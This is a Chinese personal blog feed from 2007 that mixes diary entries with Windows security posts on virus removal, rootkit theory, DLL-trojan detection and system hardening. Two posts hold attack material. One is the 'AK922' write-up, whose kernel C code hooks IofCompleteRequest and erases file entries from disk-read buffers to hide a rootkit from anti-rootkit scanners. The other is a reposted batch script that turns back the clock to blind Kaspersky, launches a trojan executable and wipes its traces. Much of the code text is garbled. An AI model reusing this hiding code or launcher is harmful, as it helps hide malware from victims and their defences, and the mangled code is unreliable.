社会是很现实的... 无尽呢喃
( Sat, 6 Oct 2007 14:20:00 +0800 )
Description:
1.到网上下载IceSword工具，并将该工具改名，如改成abc.exe 名称，这样就可以突破病毒进程对该工具的屏蔽。然后双击打开IceSword工具，结束一个8位数字的EXE文件的进程，有时可能无该进程。
2. 利用IceSword的文件管理功能，展开到C:\Program Files\Common Files\Microsoft Shared\MSINFO\下，删除2个8位随机数字的文件，其扩展名分别为：dat 和dll 。再到%windir%\help\目录下，删除同名的.hlp或者同名的.chm文件，该文件为系统帮助文件图标。
3. 然后到各个硬盘根目录下面删除Autorun.inf 文件和可疑的8位数字文件，注意，不要直接双击打开各个硬盘分区，而应该利用
资源管理器左边的树状目录来浏览。有时电脑中毒后可能无法查看隐藏文件，这时可以利用WinRar软件的文件管理功能来浏览文件和进行删除操作。
4.利用IceSword的注册表管理功能，展开注册表项到：
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
NT\CurrentVersion\Image File Execution Optio ]，删除里面的IFEO劫持项。
当完成以上操作之后，就可以***或打开杀毒软件了，然后升级杀毒软件到最新的病毒库，对电脑进行全盘杀毒。
( Thu, 27 Sep 2007 15:13:00 +0800 )
Description:
可以说，如今最复杂，最致命类型的恶意代码就是"
Rootkit
" 。顾名思义，这种恶意可以获得"root"权限，在unix系统中最高级别的权限，并部署恶意程序的很小的“包”，这些“包”往往是恶意的，并可执行的软件包。这些恶意代码可以提供连续下载并进入了用户机器。
　　今天的Rootkit技术利用手中的特权，进入操作系统的内核。这些"内核模式"Rootkit程序同其他可信赖的系统进程运行在同一较低水平级上，从而获取系统控制，并提供有效的方法来保持隐蔽。
　　Rootkit高效的获取系统准入使得安全领域的检测技术受到极大的挑战。为防止内核模式的恶意软件以及数字权限管理(DRM)的侵犯，微软在其Vista操作系统中增加了安全策略，在其设备驱动中要求数字签名。这一安全机制，一直被外界批评，因为其同时防止合法的第三方应用软件开发商驱动程序。微软认为，虽然造成部分周边设备的不相容，但vista的驱动安全策略是对创造带有引导扇区病毒后门的挑战。
Bootkit
　　前段时间恶意代码借助移动存储设备在互联网上大规模的传播。恶意软件通常隐藏在磁盘的引导扇区，它就像电子寄生虫，当用户开机时感染用户计算机。恶意代码可以影响硬盘驱动器的主引记录，每一个分区的引导扇区，或是硬盘分区表(DPT)。如今当我们讨论新的Rootkit技术可以攻破vista设备驱动签名请求时，磁盘引导病毒也已经关注于此技术。
　　" Bootkit "主要利用其内核准入和开机过程的隐身技术，当在功能上并无异于Rootkit。他们的不同主要表现在获取准入的方式上。传统的rootkit利用系统启动时提升权限。而Bootkit是被安置在外设的主引导扇区和驻留在整个系统的启动过程。这个概念是在2005年被第一次提出的，当时eEye Digital安全公司的研究人员正研究如何在系统启动时利用BIOS。他们的"BootRoot"项目介绍了如何利用系统引动过程接入windows内核的代码。
　　今年4月，在欧洲的BlachHat，来自印度NV实验室的研究人员公布了允许接入内核的引导代码“VBootkit”。尽管对于Bootkit和VBootkit存在一些争议，但最新的VBootkit包含可以在Microsoft Vista启动过程中执行的代码。不论那种引导平台被使用，但bootkit技术大都在系统启动过程做文章。
　　Bootkit的引导扇区代码总是在ROM BIOS执行后主引导记录被载入前劫持系统启动程序。一旦被载入到内存，代码便执行中断指令，也就是俗称的HOOK挂钩。它挂接到INT 13指示后续扇区读取其信息。这个过程完成后，Bootkit试图改变引导过程的结构和操作逻辑流程。
　　这些修改代码在系统启动的各个阶段被使用以便于绕过数字签名验证。为了使Bootkit代码不被检测出，许多强制跳转在内存中被使用。Rootkit也可以估算替换封包内容值，这些位值可以被利用来验证文件的完整性。
　　一旦Rootkit悄无声息的进驻系统内核，便可以执行更多的有效指令。至少一个秘密的通道已经被建立起来，恶意代码或黑客可以不受限制的进入受害人的机器。Rootkit的附加指令可以执行并获取用户的名及密码，禁用某些应用程序(这往往是一些安***件或反病毒工具)，利用受害者机器作为代理进行攻击或传播自己的Rootkit。
　　这些被利用来操纵系统内核的机器指令方法充分证明了恶意程序的严重性。虽然有很多检测清除Rootkit的工具存在，但是Rootkit也强调了预防的严重性。引导过程注入使得我们必须将准入策略作为整个安全体系的一部分。
　　要防Bbootkit技术就必须保护计算机的启动过程。系统的BIOS可配置成关闭除硬盘以外任何设备启动。此外去禁止任意未经授权的改变，系统BIOS可以采用密码保护。限制主板BIOS和BIOS电源的接入，两者都可以用来清除bios的密码。放置在公共场所的系统，应考虑驱除外接media组件，例如软驱及CD/DVD驱动器。
　　不论何种接入系统内核的手段，Rootkit的威力是巨大的并且是实实在在的威胁。虽然Rootkit在众多恶意软件中还只占了很小一部分，但是大多数安全软件相对恶意软件技术是滞后的，并且Rootkit是很难被检测出其存在的。系统的周遍保护，限制用户权限级别，加上严格控制经营服务将提供强大的网络防御，抵制恶意渗透。当然安全厂商也应加紧分析Rootkit技术，并在其产品中应用，保证用户的使用安全。
( Sun, 23 Sep 2007 10:45:00 +0800 )
Description:
一路走好吧，虽然我再也听吾倒你的声音，但，我可以感受到你的身影，你的笑容，你的喧哗，你的哭声，甚至你的痛苦，或许甘样系一种解脱，一种从痛苦中的解脱。希望你可以系另外一个世界过行开心些。或许，多年之后，我们都会在另外一个世界相见，再见吧。我的表妹－－思源。
( Sun, 23 Sep 2007 09:13:00 +0800 )
Description:
AK922: 突破磁盘低级检测实现文件隐藏
作者：Azy
email: Azy000@gmail.com
完成于：2007-08-08 目前，一些已公开的主流anti-rootkit检测隐藏文件主要有两种方法：第一种是文件系统层的检测，属于这一类的有icesword，dark y，gmer等。第二种便是磁盘级别的低级检测（Disk Low-Level Sca ing），属于这一类的ark也很多，典型代表为rootkit unhooker，filereg（is的插件），rootkit revealer，blacklight等。当然，还有一些工具，它们在应用层上通过调用ZwQueryDirectoryFile来实施检测。 驱动也好，应用也罢，说白了就是直接或间接发送IRP到下层驱动。第一类的发送到FSD中（fastfat.sys/ntfs.sys），第二类被发送到磁盘驱动（disk.sys），而后IRP便会携带相应的文件信息返回，这时上层应用再根据返回信息进行处理和判断。但是由于Disk级比FS级更底层，IRP返回给我们的是更加接近数据原始组织方式的磁盘扇区信息，所以在Disk层上实施文件检测可以得到更令人信服的结果。但这并不等于说这类检测不能被击败。本文就将介绍一种绕过该类检测的实现方法，当然，这也是在AK922中使用的。 对于要实现文件隐藏的RK，与其说是“绕过”，还不如说是“拦截” -- 挂钩某些内核函数调用，以便在返回上层之前我们有机会过滤掉待隐藏文件的信息。 AK922采用的方法是Hook内核函数IofCompleteRequest。这个函数很有意思，因为它不仅是一个几乎在任何驱动中都要调用的函数，而且参数中正好含有IRP。有了IRP，就有了一切。这些特性决定了它很适合做我们的“傀儡”。但更重要的是，一般在驱动中调用IofCompleteRequest之时IRP操作都已完毕，IRP中相关域已经填充了内容，这就便于我们着手直接进行过滤而不用再做诸如发送IRP***完成例程之类的操作。 下面就着重说一下工作流程： 首先，判断MajorFunction是不是IRP_MJ_READ以及IO堆栈中的DeviceObject是否是磁盘驱动的设备对象，因为这才是我们要处理的核心IRP，所有ark直接发送到Disk层的IRP在这里都可以被拦截到。 接下来的处理要特别注意，进入到这里时IRQL是在APC_LEVEL以上的，因此我们不能碰任何IRP中的用户模式缓冲区，一碰极有可能蓝，也就是说我们不能直接处理相关磁盘扇区信息，而必须通过ExQueueWorkItem排队一个WorkItem的方法来处理。除此之外，由于Disk层在设备堆栈中处于靠下的位置，大部分IRP发到这里时当前进程上下文早已不是原始IRP发起者的进程上下文了，这里的发起者应理解为ark进程。幸运的是在IRP的Tail.Overlay.Thread域中还保存着原始ETHREAD指针，为了操作用户模式缓冲区，必须调用KeAttachProce 切到IRP发起者的上下文环境中，而这个工作只能在处于PASSIVE_LEVEL级上的工作者线程中执行。在DISPATCH_LEVEL级上，做的事越少越好。 刚开始我还分两种情况进行处理：因为并不是所有的IRP都不处在原始上下文中，比如icesword发的IRP到这里还是处在icesword.exe进程中的，这时我认为可以不用排队工作项，这样就可以节省很多系统资源，提高过滤效率。于是我试图在DISPATCH_LEVEL级上直接操作用户缓冲区，但这根本行不通。驱动很不稳定，不一会就蓝了。故索性老老实实地排队去了，然后再分情况处理。代码如下：
// 处理Disk Low-Level Sca ing
if(irpSp-MajorFunction == IRP_MJ_READ &am am IsDiskDrxDevice(irpSp-DeviceObject) &am am irpSp-Parameters.Read.Length != 0)
{ orgnThread = Irp-Tail.Overlay.Thread; orgnProce = IoThreadToProce (orgnThread); if(Irp-MdlAddre ) { UserBuffer = (PVOID)((ULONG)Irp-MdlAddre -StartVa + Irp-MdlAddre -ByteOffset); // UserBuffer必须有效 if(UserBuffer) { if(KeGetCurrentIrql() == DISPATCH_LEVEL) { RtlZeroMemory(WorkerCtx, sizeof(WORKERCTX)); WorkerCtx-UserBuffer = UserBuffer; WorkerCtx-Length = irpSp-Parameters.Read.Length; WorkerCtx-EProc = orgnProce ExInitializeWorkItem(&am WorkerCtx-WorkItem, WorkerThread, WorkerCtx); ExQueueWorkItem(&am WorkerCtx-WorkItem, CriticalWorkQueue); } } }
} 来到工作者线程，到了PASSIVE_LEVEL级上，切换上下文之后，似乎安全多了。但是以防万一，操作用户模式缓冲区之前还是要调用ProbeForXxx函数先判断一下。相关代码如下：
VOID WorkerThread(PVOID Context)
{ KIRQL irql; PEPROCESS eproc = ((PWORKERCTX)Context)-orgnEProc; PEPROCESS currProc = ((PWORKERCTX)Context)-currEProc; //PMDL mdl; if(((PWORKERCTX)Context)-UserBuffer) { if(eproc != currProc) { KeAttachProce (eproc); __try{ // ProbeForWrite must be ru ing = APC_LEVEL ProbeForWrite(((PWORKERCTX)Context)-UserBuffer, ((PWORKERCTX)Context)-Length, 1); HandleAkDiskHide(((PWORKERCTX)Context)-UserBuffer, ((PWORKERCTX)Context)-Length); } __except(EXCEPTION_EXECUTE_HANDLER){ //DbgPrint("we can't op the buffer now :-("); KeDetachProce () retur } KeDetachProce () }else{ __try{ // ProbeForWrite must be ru ing = APC_LEVEL ProbeForWrite(((PWORKERCTX)Context)-UserBuffer, ((PWORKERCTX)Context)-Length, 1); HandleAkDiskHide(((PWORKERCTX)Context)-UserBuffer, ((PWORKERCTX)Context)-Length); } __except(EXCEPTION_EXECUTE_HANDLER){} } }
} 准备工作终于算是做得差不多了，下面就开始真正涂改磁盘扇区内容了。这里将涉及到FAT32和NTFS磁盘文件结构，我先把要用到的主要结构列出来，其余的大家可以参考《NTFS Documentation》。
typedef struct _INDEX_HEADER{ UCHAR magic[4]; USHORT UpdateSequenceOffset; USHORT SizeInWord LARGE_INTEGER LogFileSeqNumber; LARGE_INTEGER VCN; ULONG IndexEntryOffset // needed! ULONG IndexEntrySize; ULONG AllocateSize;
}INDEX_HEADER, *PINDEX_HEADER;
typedef struct _INDEX_E***Y{ LARGE_INTEGER MFTReference; USHORT Size // needed! USHORT FileNameOffset; USHORT Flag USHORT Padding; LARGE_INTEGER MFTReferParent; LARGE_INTEGER CreationTime; LARGE_INTEGER ModifyTime; LARGE_INTEGER FileRecModifyTime; LARGE_INTEGER Acce Time; LARGE_INTEGER AllocateSize; LARGE_INTEGER RealSize; LARGE_INTEGER FileFlag UCHAR FileNameLength; UCHAR NameSpace; WCHAR FileName[1];
}INDEX_E***Y, *PINDEX_E***Y; 在读取磁盘文件信息时每次都是以一个扇区大小（512 bytes）的整数倍进行的，如果不了解相应卷的组织形式和数据结构，那么感觉就是数据多而繁杂，搜索效率也很低。但辅以上述结构便可快速定位待隐藏文件并进行涂改。这里不得不说一句，算法的高效是很重要的，如果采用暴力搜索的方式，那么系统BSOD的概率会大大增加。 在FAT32卷上，当AK922搜索到文件AK922.sys的目录项时，将其0x0偏移处的文件名的第一个字节置为"0xe5"，即标记为删除。这样即可达到欺骗ark的目的。但为了更加隐蔽，不让winhex察觉出来，最好把文件名全部清0。 处理NTFS卷稍微麻烦些，文件记录和索引项都要抹干净，具体实现见代码，这里不再赘述。
VOID HandleAkDiskHide(PVOID UserBuf, ULONG BufLen)
{ ULONG i; BOOLEAN bIsNtfsIndex; BOOLEAN bIsNtfsFile; ULONG offset = 0; ULONG indexSize = 0; PINDEX_E***Y currIndxEntry = NULL; PINDEX_E***Y preIndxEntry = NULL; ULONG currPositio IsNtfsFile = (_strnicmp(UserBuf, NtfsFileRecordHeader, 4) == 0); IsNtfsIndex = (_strnicmp(UserBuf, NtfsIndexRootHeader, 4) == 0); if(bIsNtfsFile == FALSE &am am bIsNtfsIndex == FALSE) { for(i = 0; i BufLen/0x20; i++) { if(!_strnicmp(UserBuf, fileHide, 5) &am am !_strnicmp((PVOID)((ULONG)UserBuf+0x8), fileExt, 3)) { *(PUCHAR)UserBuf = 0xe5; *(PULONG)((ULONG)UserBuf + 0x1) = 0; reak; } UserBuf = (PVOID)((ULONG)UserBuf + 0x20); } } else if(bIsNtfsFile) { //DbgPrint("FILE0..."); for(i = 0; i BufLen / FILERECORDSIZE; i++) { if(!_wc icmp((PWCHAR)((ULONG)UserBuf + 0xf2), hideFile, 9)) { memset((PVOID)UserBuf, 0, 0x4); memset((PVOID)((ULONG)UserBuf + 0xf2), 0, 18); reak; } UserBuf = (PVOID)((ULONG)UserBuf + FILERECORDSIZE); } } else if(bIsNtfsIndex) { //DbgPrint("INDX..."); // Index Entries offset = ((PINDEX_HEADER)UserBuf)-IndexEntryOffset + 0x18; indexSize = BufLen - offset; currPosition = 0; currIndxEntry = (PINDEX_E***Y)((ULONG)UserBuf + offset); //DbgPrint(" -- offset: 0x%x indexSize: 0x%x", offset, indexSize); while(currPosition indexSize &am am currIndxEntry-Size 0 &am am currIndxEntry-FileNameOffset 0) { if(!_wc icmp(currIndxEntry-FileName, hideFile, 9)) { memset((PVOID)currIndxEntry-FileName, 0, 18); if(currPosition == 0) { ((PINDEX_HEADER)UserBuf)-IndexEntryOffset += currIndxEntry-Size; reak; } reIndxEntry-Size += currIndxEntry-Size; reak; } currPosition += currIndxEntry-Size; reIndxEntry = currIndxEntry; currIndxEntry = (PINDEX_E***Y)((ULONG)currIndxEntry + currIndxEntry-Size); } }
} 水平有限，欢迎大家与我交流。
( Mon, 17 Sep 2007 09:28:00 +0800 )
Description:
　　有攻必有防。看看攻击的方法。。。注：转自黑吧 ::======修改系统时间使卡巴监控失效============
set date=%date%
date 1980-01-01
::========倒计时等待10秒======================
@echo off &am setlocal enableexte io echo WScript.Sleep 1000 %temp%.\tmp$$$.v set /a i = 10
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
cscript //nologo %temp%.\tmp$$$.v goto Timeout
goto End
::===========倒计时结束，运行鸽子=============
%systemroot%\temp\mm.exe
::======恢复时间(卡巴监控)=======================
date %date%
::=========清除痕迹============================
RD /S /Q %systemroot%\temp\
( Mon, 17 Sep 2007 09:24:00 +0800 )
Description:
　　很久没写这东西了。唉。郁闷的暑假。我的电脑是用卡巴的。这里介绍大家改改。
　　在“开始菜单”——“运行”（也可以用快捷键：win+r）里输入gpedit.msc，打开组策略，
依然选择
计算机配置——windows设置”——安全设置——本
地策略——用户权利指派——更改系统时间”（右边
，然后双
击（或者是右键单击，选择“属性”）打开“更新系统时间配置”属性对话框，把里面所有权限
用户名全部删除，然后点击确定，重启计算机。
( Sat, 18 Aug 2007 11:17:00 +0800 )
Description:
现在的内存容量512-1G成了标配，怎么样充分利用大内存而不浪费呢?。
　　内存越大，机器越快?我想大多数人的回答都是肯定的，从256M到512M的提示是明显的，所以想当然的，从512M到1G的提升也会很明显吧。但是我用我的亲身经历告诉你，1G的内存比512M还慢，当然前提是你什么都不设置。
　　前几天我把我的Compaq N410c扩展到了1G的内存，2×512M pc133的SD，结果扩展之后发现机器不但还跟原来一样，有点卡，而且休眠时间变长了，这是肯定的啦，休眠就是把内存里的东西拷贝到硬盘上，内存越大，休眠时间肯定越长了，这让我很郁闷，难道我花了500多升级我的机器，反而比原来更慢了。
　　我用memstate这个软件实时监测我的内存情况，发现一直都有600多兆的空余内存，这说明机器的内存是非常够用的，甚至很多都在被浪费着，可是机器为啥还是这么慢呢?于是我到google上找原因，结果发现已经有很多人发现这个问题了，并且已经有了权威的解释，这里我把关键的部分摘抄出来，并结合自己的使用心得与大家分享。注：这里的修改以及使用方法均针对XP系统。
修改注册表发挥大内存优势
　　现在请打开注册表编辑器，找到[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Se ion Manager\MomoryManagement]，在右侧窗格修改一下键值(要注意的是，做一下设置的前提是内存最好超过512MB，并仅限于Windows 2000/XP)。
　　(1)"LargeSystemCache"(启动大的系统缓存)：在内存中开辟一块大的内存空间用于磁盘文件系统的预读取操作。当程序连续请求的数据增加时，Windows通过系统缓存自动预读，使程序能以最快速度获取所需数据。由于启用这个系统缓冲会占用较多的物理内存，使得能被程序利用的可用物理内存减少。将其值设为1。这样，系统缓存从4MB增加到8MB。
　　(2)"SecondLevelDataCache"(提高cpu性能)：CPU的处理速度要远远大于内存的存取速度，而内存又要比硬盘快得多。这样CPU与内存之间，内存与磁盘之间就形成了影响性能的瓶颈效应，前面的"LargeSystemCache"是为了缓解内存与磁盘瓶颈而设计的，而CPU为了能够迅速从内存获取处理数据也设置了一种缓冲机制L2 Cache(二级缓存)。调整这个键值能够使Windows更好地配合CPU利用该缓存机制获得更高的数据预读取命中率。建议将其设置为512。
　　(3)DisablePagingExecutive(禁用页面文件)：将其值改为1(十六进制)，这样将使所有程序和数据强制性限定在物理内存中运行，而不是使用虚拟内存。很明显，当有足够多的物理内存来完成所需任务时，这样做必使系统性能得到巨大的提升。对于内存仅有64MB的用户而言启用它或许就是灾难——系统频繁出错，直至崩溃。
　　(4)"IOPageLockLimit"(定制输入/输出缓冲尺寸)：输入输出系统是设备和微处理器之间传输数据的通道，当扩大其缓冲尺寸时数据传递将更为流畅。同理，具体设置多大的尺寸要视物理内存的大小和运行任务多少来决定，一般来说，如果内存有64MB就可将该双字节键的16进制值设置为400(1MB)、800(2MB)或1000(4MB)128MB内存可设为1000(4MB)、2000(8MB)或4000(16MB);256MB内存4000(16MB)或8000(32MB)。当然如果有更多内存，完全可以将其设为10000(64MB)甚至更多。当设为0时，Windows将自动配置。
　　设置这些之后，重启系统即可。其实修改这些的效果并不是很明显，不过心理上总有个安慰吧，下面的才是让你感到质的飞跃的地方。
利用虚拟硬盘软件
　　这里要向大家介绍一个软件，RAMDisk Plus，这个软件就是把内存的一部分划分出来作为一个磁盘分区用的，你可以把一些临时文件夹转移到这个分区上，比如IE的临时文件夹，这样会大大提升你浏览网页的速度。内存的传输速度和硬盘的传输速度的差距我想大家都清楚吧，用内存的一部分作硬盘相当于添加了一个几十万转的硬盘，速度的提升可想而知。这个是我的亲身体会，我把我的内存中的100M划出来作为一个分区，然後把IE的临时文件夹挪到上面，重启之后，打开网页就是一瞬间，以前即便是在网速很好的半夜，也没有这么快的，看来很多时候网速不是瓶颈，机器才是瓶颈啊，尤其是那些图片较多，需要缓存的网页，大家可以试试。划出这100M内存之后，我现在的正常可用内存还保持在500M以上，还有好多空间啊，好在RAMDISK plus可以添加多个分区，我可以再划出来几个分区，然后把一些常用程序放进去，这样运行起来肯定也快多了。
　　不过记住，内存掉电后里面东西就都没了，但是还好，Ramdisk plus提供了关机自动保存的选项，也就是关机的时候可以把虚拟硬盘分区中的东西保存到实际硬盘分区中你指定的地方，然后开机的时候再load回来，跟休眠的道理差不多啦，只是这样就会导致关机时间和开机时间变得很长，所以我建议只在虚拟硬盘分区上放临时文件，反正临时文件迟早是要被清空的，放到ramdisk上还省去了手动清空的麻烦。
( Fri, 17 Aug 2007 22:32:00 +0800 )
Description:
在电脑配置并不高的机子上，不***杀毒软件肯定效率要高得多。本人两年多不用杀毒软件也并没有病毒染身的原因。说白了就是以用户身份上网!而不是管理员身份。下面说一下怎么以用户方式上网。
　　1、***系统后(包括GhostXP)，首先把所有分区都转化成NTFS格式，很重要哦。不要说不会啊，就是单击开始按钮——运行.输入 "convert c: /fs:ntfs ",可以把C盘转换成NTFS格式,不过要重启才能转换哦,其它盘就把C:改成相应的盘符就行了.
　　2、在控制面板中打开"用户帐号",将Administrator修改密码,尽量复杂些,不一定要记得.再创建一个计算机管理员用户和受限用户,管理员用户一定要密码,且也要复杂一些,这个密码要记住.因为以后装软件,游戏要用上.当然,记不住可以在DOS下改.
　　3、设置好后，进入创建的计算机管理员用户，打开“我的电脑”，单击“工具”——“文件夹选项”，点击第二个选项卡“查看”，把里面的“使用简单文件共享(推荐)”前的勾去掉。这个是以后打开文件夹或文件的属性时会出现“安全”选项卡。
　　4、把所有分区属性的“安全”选项卡中“users”用户去掉。这是它默认有一个特殊权限，可以在分区下或文件夹内创建文件夹。再可以创建或保存文件，这可能给病毒可乘之机。所以去掉。还有一个是“everyone".也去掉。添加创建的受限用户进去，权限是”只读”。
　　5、个别文件的权限问题：象QQ、游戏都需要完全权限，所以在计算机管理员用户中要给受限用户完全权限。QQ最好把与QQ程序在一起的文件给只读权限，防止木马替换QQ及相关的DLL文件。
　　6、在“运行”中输入“REGEDIT”，打开注册表，把里面的[HKEY_CURRENT_USER \Software \Microsoft \Windows \CurrentVersion\ Run]或[HKEY_CURRENT_USER \Software \Microsoft \Windows \CurrentVersion \Runonce]的权限设为只读。防止病毒利用此处启动。
　　7、清理上网缓存及临时文件，上网时，一般缓存放在C:\Documents and Settings\用户名\Local Settings \Temporary Internet Files中，这也是病毒藏匿的地方，还有就是C:\Documents and Settings\用户名\Local Settings\Temp 下的临时文件。很多程序要用到这个地方。病毒也喜欢藏在这里，所以，在开机时，用批命令清空这两个文件夹。让病毒无处藏身。批命令为：
　　del C:\docume~1\用户名\Locals~1\Tempor~1\*.*
　　del C:\Docume~1\用户名\Locals~1\Temp\*.*
　　当然还可以把History和Cookies都清空。
　　做一个批命令文件，放到开始菜单中的“启动”项中。
　　这样也就做好了受限用户上网的准备工作，网上的病毒已经无法感染你的系统，也无法更改系统文件，对其它分区也无权更改，这样U盘病毒也无关紧要，因为病毒无法写入分区根目录下。网页病毒无法更改系统文件，再凶的网页病毒也无能为力了。
　　当然，此种方式对狂***软件的人不适合，要想试用软件，如果不***杀毒软件，最好利用虚拟机，象VMware和Virtual PC。对于只下音乐或电影的，没什么影响。
　　希望上网想裸奔的朋友能用得上!!!!
( Sat, 4 Aug 2007 11:45:00 +0800 )
Description:
如果您的电脑使用的是nforce芯片组的主板和串口硬盘。在系统中***好所有的硬件驱动程序后，发现在任务栏右下角始终会显示一个“安全删除硬件”的图标。这是nforce芯片组在***了IDE-SW主板驱动以后，系统会把SATA硬盘识别为可移动设备，每次开机后都会显示这个图标。
图1 安全删除硬件
清除方法：
　　打开注册表定位到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\nvata用右键点击“nvata”，选择“新建/DWORD值”选项，此时会在右侧窗口中添加一个“新值il”项，将它重命名为“DisableRemovable”,再双击它打开“编辑DWORD值”对话框，将“数值数据”更改为“1”，点击“确定”按钮即可。
　　如果在注册表中找不到“nvata”键值，可定位到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\nvatabus在点击“nvatabus”创建和设置“DisableRemovable”键值即可。
　　重启电脑后，系统就不会将SATA硬盘识别为可移动设备了，那个“安全删除硬件”图标也就消失了，而且不会影响其它可移动设备的正常使用，在插入U盘或移动硬盘等设备后，系统仍然会出现“安全删除硬件”的图标。
( Fri, 3 Aug 2007 23:27:00 +0800 )
Description:
　　郁闷的程序员考试　，郁闷的暑假。。。 程序员考试，没过，吃惊之外，另有一些人过了，天理呢。。。
　　唉，都怪自己吾够争气啊，太自大，小小的也，都无过。。。郁闷。。。
　　回想起来，咩寄望于暑假，全部都是废话的。。。暑假　，我到底做左D咩来呢。。
　　郁闷。。。自从果次去睇完表妹之后，心好乱，好烦，
　　有句话，讲得好好的，“衣其不幸，怒其不争”，岩岩，体现系我表妹的身上呢。。。
　　喊都没用的。要坚强D啊。
　　希望快D好翻啦。
　　　　　　　　　　　　　　　　　　　　　　　　－－你少讲也的表哥
( Thu, 12 Jul 2007 09:22:00 +0800 )
Description:
首先，我们来了解一下什么是动态嵌入式木马，为了在NT系统下能够继续隐藏进程，木马的开发者们开始利用DLL(Dynamic Link Library动态链接库)文件，起初他们只是将自己的木马写成DLL形式来替换系统中负责Win Socket1.x的函数调用wsock32.dll(Win Socket2中则由WS2_32.DLL负责)，这样通过对约定函数的操作和对未知函数的转发(DLL木马替换wsock32.dll时会将之更名，以便实现日后的函数转发)来实现远程控制的功能。但是随着MS数字签名技术和文件恢复功能的出台，这种DLL马的生命力也日渐衰弱了，于是在开发者的努力下出现了时下的主流木马--动态嵌入式DLL木马,将DLL木马嵌入到正在运行的系统进程中.explorer.exe、svchost.exe、sm .exe等无法结束的系统关键进程是DLL马的最爱，这样这样在任务管理器里就不会出现我们的DLL文件，而是我们DLL的载体EXE文件.当然通过进一步的加工DLL木马还可以实现另外的一些如端口劫持/复用(也就是所谓的无端口)、注册为系统服务、开多线程保护、等功能。简而言之，就是DLL木马达到了前所未有的隐蔽程度。
那么我们如何来发现并清除DLL木马呢?
　　一，从DLL木马的DLL文件入手，我们知道system32是个捉迷藏的好地方，许多木马都削尖了脑袋往那里钻，DLL马也不例外，针对这一点我们可以在***好系统和必要的应用程序后，对该目录下的EXE和DLL文件作一个记录:运行CMD--转换目录到system32--dir *.exeexeback.txt&am dir *.dlldllback.txt,这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中,日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了.这是我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运行CMD--fc exeback.txt exeback1.txtdiff.txt &am fc dllback.txt dllback1.txtdiff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好，如果有的话也不要直接DLL掉，我们可以先把它移到回收站里，若系统没有异常反应再将之彻底删除或者提交给杀毒软件公司。
　　二、上文也曾提到一些系统关键进程是这类木马的最爱，所以一旦我们怀疑系统已经进驻了DLL木马，我们当然要对这些关键进程重点照顾了，怎么照顾?这里推荐一个强大的脱壳工具工具Procedump.exe他可以帮您看出进程到底调用了那些DLL文件(如图1)但是由于有的进程调用的DLL文件非常多，使得靠我们自己去一个核对变的不太现实，所以我们会用到一个shotgun写的NT进程/内存模块查看器 .exe，用命令 .exe /a /m > owdlls.txt将系统目前调用地所有DLL文件地名称保存到nowdlls.txt，然后我们再用fc将之于事先备份dllback.txt比较一下，这样也能够缩小排查范围。
　　三、还记得木马的特征之一端口么?所有的木马只要进行连接，只要它接受/发送数据则必然会打开端口，DLL木马也不例外，这也为我们发现他们提供了一条线索，我们可以使用foundstone的进程端口查看工具Fport.exe来查看与端口对应的进程,这样可以将范围缩小到具体的进程,然后结合Procedump来查找DLL木马就比较容易了.当然有如上文提到的有些木马会通过端口劫持或者端口重用的方法来进行通信,139、80、1443、等常见端口则是木马的最爱。因为即使即使用户使用端口扫描软件检查自己的端口，发现的也是类似TCP UserIP:1026　ControllerIP:80ESTABLISHED 的情况，稍微疏忽一点，您就会以为是自己在浏览网页(防火墙也会这么认为的)。所以光看端口还不够，我们要对端口通信进行监控，这就是第四点要说的。
　　四、我们可以利用嗅探器来了解打开的端口到底在传输些什么数据。通过将网卡设为混杂模式就可以接受所有的IP报文，嗅探程序可以从中选择值得关注的部分进行分析，剩下的无非是按照RFC文档对协议进行解码。这样就可以确定木马使用的端口。
　　五、通常说道查杀木马我们会习惯性地到注册表碰碰运气，以前可能还蛮有效的，但如果碰到注册为系统服务的木马(原理:在NT/2K/XP这些系统中，系统启动时会加载指定的服务程序)这时候检查:启动组/注册表/autoexec.bat/win.ini/sysytem.ini/wininit.ini/*.inf(例如autorun.inf)/config.sys等文件就发现不了丝毫的异样，这时候我们就应该查看一下系统服务了:右击我的电脑--管理--服务和应用程序--服务，这时您会看到100多个服务，，当然如果您以前曾经用导出列表功能对服务备份过，则用文件比较的方法会很容易发现哪些是外来客，这时您可以记录下服务加载的是那个文件，然后用Resource Kits里提供的srvi tw.exe来移除该服务并清除被加载的文件。
　　通过以上五步，基本能发现并清除狡猾的动态嵌入式DLL木马了,也许您也发现如果适当地做一些备份，会对我们的查找木马的过程有很大的帮助，当然也会减轻不少工作的压力
( Thu, 5 Jul 2007 21:48:00 +0800 )
Description:
又一个学期过去啦！！！时间过得好快，转眼下个学期就要出来稳
也做，以家心好乱，暑假系去打工呢！定系留系屋企自己学也呢！都
没具体的安排，中有两科考试就了结呢个学期啦
，甘样，踏入社会
又更进一步了，期待中，毕竟我都想稳份好工，然后。。。就系人生
( Sun, 10 Jun 2007 18:45:14 +0800 )
Description: [%repeat_0 match="/data/option"%]
[%=@title%]
[%=@count%]票 [[%=@percent%]％]
[%_repeat_0%] 某日,上厕所摆滩时,发现窗台的一本杂志,我睇到很醒目的两个字.疲倦. 心想....反正都系系度摆滩.无其它的也做.甘就拿来睇睇啦...文章,引人入胜,开头就开明见山了.真指疲倦,先讲 一D事例,如...钢都会疲倦,何况是人呢!!! 系啊...睇住睇住...我发觉...我自己已经处于作者所指的症状下啦!!!身体的疲倦,不可怕...可怕的是心灵的疲倦啊 诚然,作者的所提出的观点都可以真刺我的心头啊...不过...文中讲左,大自然对疲倦的解决方法,但人呢!!! 心平气和.甘样休养生息.我一D头绪都没.因为要做到甘...实在系太难.太难啦. 想放松...却越来越紧张...却越来越疲倦... 根源中没稳倒...想解决...中有一段距离...
( Thu, 7 Jun 2007 21:59:46 +0800 )
Description: 5月26号,程序员考试终于结束了.汗!!!居然今日先写BLOG.真系有D...
回顾26号的考试,觉得都吾系几难接...
天啊!!!选做题,没画圈圈啊!!!
